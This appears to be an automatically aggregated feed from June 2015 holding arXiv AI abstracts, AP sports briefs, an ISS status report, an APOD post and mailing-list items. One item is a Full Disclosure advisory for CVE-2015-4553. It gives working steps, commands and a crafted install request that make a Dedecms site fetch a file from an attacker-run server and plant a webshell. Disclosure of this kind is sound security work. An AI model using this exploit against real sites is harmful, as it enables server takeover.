SNA-based reasoning for multiagent team composition. (arXiv:1506.05154v1 [cs.MA])

The social network analysis (SNA), branch of complex systems can be used in the construction of multiagent systems. This paper proposes a study of how social network analysis can assist in modeling multiagent systems, while addressing similarities and differences between the two theories. We built a prototype of multi-agent systems for resolution of tasks through the formation of teams of agents that are formed on the basis of the social network established between agents. Agents make use of performance indicators to assess when should change their social network to maximize the participation in teams



from cs.AI updates on arXiv.org http://ift.tt/1fiehEl
via IFTTT

SAT-based Analysis of Large Real-world Feature Models is Easy. (arXiv:1506.05198v1 [cs.SE])

Modern conflict-driven clause-learning (CDCL) Boolean SAT solvers provide efficient automatic analysis of real-world feature models (FM) of systems ranging from cars to operating systems. It is well-known that solver-based analysis of real-world FMs scale very well even though SAT instances obtained from such FMs are large, and the corresponding analysis problems are known to be NP-complete. To better understand why SAT solvers are so effective, we systematically studied many syntactic and semantic characteristics of a representative set of large real-world FMs. We discovered that a key reason why large real-world FMs are easy-to-analyze is that the vast majority of the variables in these models are unrestricted, i.e., the models are satisfiable for both true and false assignments to such variables under the current partial assignment. Given this discovery and our understanding of CDCL SAT solvers, we show that solvers can easily find satisfying assignments for such models without too many backtracks relative to the model size, explaining why solvers scale so well. Further analysis showed that the presence of unrestricted variables in these real-world models can be attributed to their high-degree of variability. Additionally, we experimented with a series of well-known non-backtracking simplifications that are particularly effective in solving FMs. The remaining variables/clauses after simplifications, called the core, are so few that they are easily solved even with backtracking, further strengthening our conclusions.



from cs.AI updates on arXiv.org http://ift.tt/1Ljnmqx
via IFTTT

Why Bother With Syntax?. (arXiv:1506.05282v1 [cs.AI])

This short note discusses the role of syntax vs. semantics and the interplay between logic, philosophy, and language in computer science and game theory.



from cs.AI updates on arXiv.org http://ift.tt/1GQhEwn
via IFTTT

Early Predictions of Movie Success: the Who, What, and When of Profitability. (arXiv:1506.05382v1 [cs.AI])

This paper proposes a decision support system to aid movie investment decisions at the early stage of movie productions. The system predicts the success of a movie based on its profitability by leveraging historical data from various sources. Using social network analysis and text mining techniques, the system automatically extracts several groups of features, including "who" are on the cast, "what" a movie is about, "when" a movie will be released, as well as "hybrid" features that match "who" with "what", and "when" with "what". Our experiments with movies during an 11-year period showcase the system's decent performance in predicting movie success. Moreover, experiment results also suggest that different groups of features, including novel features we proposed, all contribute to the prediction.



from cs.AI updates on arXiv.org http://ift.tt/1fiehEh
via IFTTT

Hybrid Algorithm for Multi-Objective Optimization by Greedy Hypervolume Maximization. (arXiv:1506.05424v1 [cs.NE])

This paper introduces a high-performance hybrid algorithm, called Hybrid Hypervolume Maximization Algorithm (H2MA), for multi-objective optimization that alternates between exploring the decision space and exploiting the already obtained non-dominated solutions. The proposal is centered on maximizing the hypervolume indicator, thus converting the multi-objective problem into a single-objective one. The exploitation employs gradient-based methods, but considering a single candidate efficient solution at a time, to overcome limitations associated with population-based approaches and also to allow an easy control of the number of solutions provided. There is an interchange between two steps. The first step is a deterministic local exploration, endowed with an automatic procedure to detect stagnation. When stagnation is detected, the search is switched to a second step characterized by a stochastic global exploration using an evolutionary algorithm. Using five ZDT benchmarks with 30 variables, the performance of the new algorithm is compared to state-of-the-art algorithms for multi-objective optimization, more specifically NSGA-II, SPEA2, and SMS-EMOA. The solutions found by the H2MA guide to higher hypervolume and smaller distance to the true Pareto frontier with significantly less function evaluations, even when the gradient is estimated numerically. Furthermore, although only continuous decision spaces have been considered here, discrete decision spaces could also have been treated, replacing gradient-based search by hill-climbing. Finally, a thorough explanation is provided to support the expressive gain in performance that was achieved.



from cs.AI updates on arXiv.org http://ift.tt/1Ljnmqt
via IFTTT

Fair assignment of indivisible objects under ordinal preferences. (arXiv:1312.6546v4 [cs.GT] UPDATED)

We consider the discrete assignment problem in which agents express ordinal preferences over objects and these objects are allocated to the agents in a fair manner. We use the stochastic dominance relation between fractional or randomized allocations to systematically define varying notions of proportionality and envy-freeness for discrete assignments. The computational complexity of checking whether a fair assignment exists is studied for these fairness notions. We also characterize the conditions under which a fair assignment is guaranteed to exist. For a number of fairness concepts, polynomial-time algorithms are presented to check whether a fair assignment exists. Our algorithmic results also extend to the case of unequal entitlements of agents. Our NP-hardness result, which holds for several variants of envy-freeness, answers an open question posed by Bouveret, Endriss, and Lang (ECAI 2010). We also propose fairness concepts that always suggest a non-empty set of assignments with meaningful fairness properties. Among these concepts, optimal proportionality and optimal weak proportionality appear to be desirable fairness concepts.



from cs.AI updates on arXiv.org http://ift.tt/Jm0tYR
via IFTTT

Swiss champion Basel agrees to end coach Sousa's contract

BASEL, Switzerland (AP) Swiss champion Basel says it has agreed to terminate coach Paulo Sousa's contract after just one season.

from FOX Sports Digital http://ift.tt/1HUwuTt
via IFTTT

[FD] [CVE-2015-4553]Dedecms variable coverage leads to getshell

[CVE-2015-4553]Dedecms variable coverage leads to getshell ############################################################################# # # DBAPPSECURITY LIMITED http://ift.tt/1QJxXMS # ############################################################################# # # CVE ID: CVE-2015-4553 # Subject: Dedecms variable coverage leads to getshell # Author: zise # Date: 06.17.2015 ############################################################################# Introduction: ======== dedecms Open source cms Extensive application Influence version Newest dedecms 5.7-sp1 and all old version Remote getshell Details: ======= After the default installation of dedecms Installation directory /install/index.php or /install/index.php.bak /install/index.php //run iis apache exploit /install/index.php.bak //run apache exploit Step 1 ############################################################################# Clear file contents config_update.php ====File content==== [×] 远程获取失败 ### ###After execution file 0 byte ~ho~year~#### 2015/06/17 14:55 0 config_update.php 1 file 0 byte Step 2 ############################################################################# Create local HTTP services zise:tmp zise$ ifconfig en0 en0: flags=8863 mtu 1500 inet 119.253.3.18 netmask 0xffffff00 broadcast zise:tmp zise$ mkdir "dedecms" zise:tmp zise$ cd dedecms/ zise:dedecms zise$ echo "" > demodata.a.txt zise:dedecms zise$ cd ../ zise:tmp zise$ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 - #### http://ift.tt/1Bo74MC ?step=11 &insLockfile=a &s_lang=a &install_demo_name=hello.php &updateHost=http://ift.tt/1d20hwy #### HTTP/1.1 200 OK Date: Wed, 17 Jun 2015 07:11:18 GMT Server: Apache/2.4.12 X-Powered-By: PHP/5.6.6 Vary: Accept-Encoding,User-Agent Content-Length: 81 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 [√] 存在(您可以选择安装进行体验) Attack complete you webshell http://ift.tt/1Bo76UP ====================== zise ^_^ zise.shi@dbappsecurity.com.cn Security researcher

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Announcing NorthSec 2015 - Montreal, May 21-24

Hello everyone, we're very pleased to announce that NorthSec 2015 Conference Recordings are now available for free on YouTube, including talks about Privacy, Malware, Reverse Engineering, Cryptography, Bitcoins and many more : https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh Speakers slides are also being made available at the following adress : http://ift.tt/1d20hge We had an awesome 2015 edition and we're already working hard to make it even better in 2016 ! See you in May next year ! -

Source: Gmail -> IFTTT-> Blogger

Vidal appears in court; gets 4 month driving ban after DUI

SANTIAGO, Chile (AP) Chile's star midfielder Arturo Vidal was banned from driving for four months by a Chilean judge on Wednesday after he crashed his Ferrari while driving under the influence of alcohol.

from FOX Sports Digital http://ift.tt/1G4blSe
via IFTTT

ECHR Finds Website Liable for Anonymous User Comments

ECHR Finds Website Liable for Anonymous User Comments ... can be held responsible for anonymous comments on its site, Ars Technica reports.

from Google Alert - anonymous http://ift.tt/1N3amGB
via IFTTT

Leicester fires 3 players over sex tape in Thailand

LEICESTER, England (AP) English Premier League club Leicester has fired three players after a video emerged showing them in an apparent orgy with Thai sex workers, one of whom was racially abused.

from FOX Sports Digital http://ift.tt/1BnKpQH
via IFTTT

New Zealand sets England victory target of 350 in 4th ODI

NOTTINGHAM, England (AP) A combative 90 from Kane Williamson and half centuries from Grant Elliott and Martin Guptill helped New Zealand reach 349-7 in the fourth one-day international on Wednesday, setting England a national-record run chase to avoid a series defeat.

from FOX Sports Digital http://ift.tt/1BnKpQD
via IFTTT

Arsenal's Jack Wilshere fined over parade outburst

LONDON (AP) The English Football Association has fined Arsenal midfielder Jack Wilshere 40,000 pounds ($62,800) for a foul-mouthed outburst toward rival club Tottenham during his team's FA Cup victory celebrations.

from FOX Sports Digital http://ift.tt/1fht2XN
via IFTTT

Arsenal's Jack Wilshere fined over parade outburst

LONDON (AP) The English Football Association has fined Arsenal midfielder Jack Wilshere 40,000 pounds ($62,800) for a foul-mouthed outburst toward rival club Tottenham during his team's FA Cup victory celebrations.

from FOX Sports Digital http://ift.tt/1fht2XN
via IFTTT

FIFA prosecutor ready to act as World Cup bids probe widens

ZURICH (AP) FIFA ethics prosecutor Cornel Borbely says he is prepared to open more cases against officials as part of the investigations into the bidding for the 2018 and 2022 World Cups.

from FOX Sports Digital http://ift.tt/1SolVem
via IFTTT

Anonymous on Twitter: "Don't abuse government power, don't censor the web, and don't arrest ...

... Favorites 32; #TupacIsAlive Spirit Ghost Damien Devlin jnr Debbie E Don't Mind Me. Anonyamoose Esvin Barrios Anonymous News Carre d'As.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/AnonymousGlobo/status/610889147537039360&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNEFHhoJjK_jbwDfwfVvCKb9w5PDBQ
via IFTTT

Moenchengladbach signs striker Drmic from Leverkusen

MOENCHENGLADBACH, Germany (AP) Borussia Moenchengladbach says it has signed Switzerland striker Josip Drmic from Bundesliga rival Bayer Leverkusen.

from FOX Sports Digital http://ift.tt/1LfvnzN
via IFTTT

ISS Daily Summary Report – 06/16/15

Binary Colloidal Alloy Test-Low Gravity Phase Kinetics Platform (BCAT-KP):  Kelly reviewed the experiment prior to charging the D2Xs camera batteries, changing out batteries and setting the intervelometer settings. The BCAT-KP experiment aims to help materials scientists develop new consumer products with unique properties and longer shelf lives. Colloids are mixtures of small particles distributed throughout a liquid, which include milk, detergents and liquid crystals. Gravity affects how the particles clump together and sink, making the International Space Station an ideal platform to study their fundamental behaviors. Advanced Colloids Experiment Heating-1 (ACE-H1) Sample Changeout: Kelly cleaned up oil on the first ACE Heated Sample inside the Light Microscopy Module (LMM) Auxiliary Fluids Container (AFC) followed by removal and inspection of the sample. He then installed the second sample and dispensed oil. This is the second of two planned ACE-H1 samples, although a third contingency sample is available. The ACE-H1 experiment examines densely packed microscopic spheres, or colloidal mixtures, to study their transition from ordered crystals into disordered glass. The particles are fluorescent and change size in different temperatures so scientists are able to see how they move and change forms as they are heated and cooled. Studying particle interactions without the influence of gravity improves the ability of scientists to understand how increasing disorder in a crystal material affects its freezing, melting, aging and structural integrity. On Board Training (OBT) Robotics On-Board Trainer (RoBOT): Kelly and Padalka continued preparing for SpX-7 arrival, completing another OBT session. Today’s session focused on assessing vehicle motion prior to and after free drift, assessing Space Station Remote Manipulator System (SSRMS) closing rate and monitoring Latching End Effector (LEE) telemetry. Today’s Planned Activities All activities were completed unless otherwise noted. PAO hardware setup Crew preparation for PAO in JPM TV conference with Trud newspaper reporter in JPM PROBOY. Activity with RSЕ1 Station laptop. PROBOY. Activity with Penetration Simulator WRS Water Sample Analysis BCAT – Experiment Procedure Review ARED Flywheel Cylinder Evacuation PROBOY. Copy and Downlink Data Replacement of urine receptacle (МП) and filter-insert (Ф-В) in АСУ АСУ Activation after Replacement DAN. Experiment Execution Support DAN. Experiment Ops. TOCA Data Recording MPEV – Providing Access WRS – Recycle Tank Fill BCAT – Start Battery Charge OBT – Dragon Rendezvous and Berthing Procedures Review Urine Transfer from EDV-U to ТКГ 425 Rodnik Water Tank1 and Flushing cnctr KV1 Connector OBT – Dragon Rendezvous and Berthing Procedures Review FIR Rack Doors Open IMS Delta File Prep ACE-H1. Sample Changeout Video Footage of Greetings FIR. Rack Doors Closure WRS – Recycle Tank Fill СОЖ Maintenance BCAT – Battery Replacement and Photo Downlink PCS Battery Swap [Deferred] Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. RoBOT training support ACE-H1 sample changeout  Three-Day Look Ahead: Wednesday, 06/17: JEMAL pressurization, MPEP dosimeter removal, Rodent Research (RR) MSG stow, Ocular Health Thursday, 06/18: RR Microgravity Science Glovebox LSAH cleanup, Ocular Health Friday, 06/19: Ocular Health, CUCU/CCP checkout, OBT RoBOT training QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1Lhqwe8
via IFTTT

PFF President suspended over financial embezzlement, report

ISLAMABAD (AP) The Pakistan Football Federation has suspended its president Faisal Saleh Hayat for alleged incompetence and financial embezzlement, local media reported.

from FOX Sports Digital http://ift.tt/1d0TenW
via IFTTT

Sounders finish with 7 men in US Open Cup

TUKWILA, Washington (AP) Seattle Sounders finished their U.S. Open Cup derby against Portland with just seven players after three were sent off and one was injured after all substitutes had been used.

from FOX Sports Digital http://ift.tt/1KZ5jIc
via IFTTT

Swiss bank named in FIFA indictment opens investigation

ZURICH (AP) Swiss private bank Julius Baer says it is investigating its involvement in a FIFA corruption case and is cooperating with authorities.

from FOX Sports Digital http://ift.tt/1GOgEsK
via IFTTT

Asian confederation general secretary quits amid probe

KUALA LUMPUR, Malaysia (AP) The Asian Football Confederation says general secretary Alex Soosay has tendered his resignation with immediate effect.

from FOX Sports Digital http://ift.tt/1FmcIKj
via IFTTT

Brazil to meet Serbia in Under-20 World Cup final

WELLINGTON, New Zealand (AP) Brazil beat Senegal 5-0 to join Serbia in the final of the Under-20 World Cup and to bury the nascent suspicion football's great expressionists had embarked on a new, more sober course on Wednesday.

from FOX Sports Digital http://ift.tt/1R8j1rF
via IFTTT

Capello on the brink with Russian football in crisis

MOSCOW (AP) Even if FIFA scandals were not placing Russia's right to host the 2018 World Cup under scrutiny, Russian football would still be in crisis.

from FOX Sports Digital http://ift.tt/1Ttr1aH
via IFTTT

Serbia advances to under-20 World Cup final vs Brazil

AUCKLAND, New Zealand (AP) Serbia is through to Saturday's Under-20 World Cup final against Brazil after beating 10-man Mali 2-1 after extra time at North Harbour Stadium on Wednesday.

from FOX Sports Digital http://ift.tt/1GetQCw
via IFTTT

Pavel Kaderabek moves to Hoffenheim from Sparta Prague

PRAGUE (AP) Czech Republic defender Pavel Kaderabek has moved from Sparta Prague to Hoffenheim in the Bundesliga.

from FOX Sports Digital http://ift.tt/1TtprFL
via IFTTT

I have a new follower on Twitter


Ways to Stay Fit
It's the little things that you do each day that add up to being healthy and fit.


Following: 457 - Followers: 278

June 17, 2015 at 06:25AM via Twitter http://twitter.com/WaystoStayFitt

Swiss AG: 53 possible money-laundering cases in FIFA probe

BERN, Switzerland (AP) Switzerland's attorney-general says banks have noted 53 possible money-laundering incidents in his investigation of the 2018 and 2022 World Cup bidding contests.

from FOX Sports Digital http://ift.tt/1JXlKE3
via IFTTT

Chelsea opens EPL defense against Swansea, Man U hosts Spurs

LONDON (AP) Chelsea will begin its English Premier League defense against Swansea, while Manchester United hosts Tottenham on the opening weekend.

from FOX Sports Digital http://ift.tt/1Sne2WJ
via IFTTT

Brazil builds confidence with U20 World Cup semifinal win

CHRISTCHURCH, New Zealand (AP) A dominant performance full of goals was exactly what Brazil's under-20 football side needed ahead of Saturday's final.

from FOX Sports Digital http://ift.tt/1JXhILQ
via IFTTT

Brazil beats Senegal 5-0 to reach U20 WCup final

CHRISTCHURCH, New Zealand (AP) Brazil swept into the final of the Under-20 World Cup by routing Senegal 5-0 and awaits the winner of the Wednesday's second semifinal between Serbia and Mali.

from FOX Sports Digital http://ift.tt/1Lgdo9l
via IFTTT

Asian powers unconvincing in World Cup qualifying

SEOUL, South Korea (AP) The four power teams of Asian football avoided defeat in their opening World Cup qualifiers, yet none put in performances that will dispel the doubts about the strength of the region's teams following their combined winless record at the 2014 World Cup.

from FOX Sports Digital http://ift.tt/1JSS9Ny
via IFTTT

APOD is 20 Years Old Today


Welcome to the vicennial year of the Astronomy Picture of the Day! Perhaps a source of web consistency for some, APOD is still here. As during each of the 20 years of selecting images, writing text, and editing the APOD web pages, the occasionally industrious Robert Nemiroff (left) and frequently persistent Jerry Bonnell (right) are pictured above plotting to highlight yet another unsuspecting image of our cosmos. Although the featured image may appear similar to the whimsical Vermeer composite that ran on APOD's fifth anniversary, a perceptive eye might catch that it has been digitally re-pixelated using many of the over 5,000 APOD images that have appeared over APOD's tenure. (Can you find any notable APOD images?) Once again, we at APOD would like to offer a sincere thank you to our readership for continued interest, support, and many gracious communications. If you consider yourself a fan of APOD, you might want to consider joining the Friends of APOD. via NASA http://ift.tt/1Ca37pO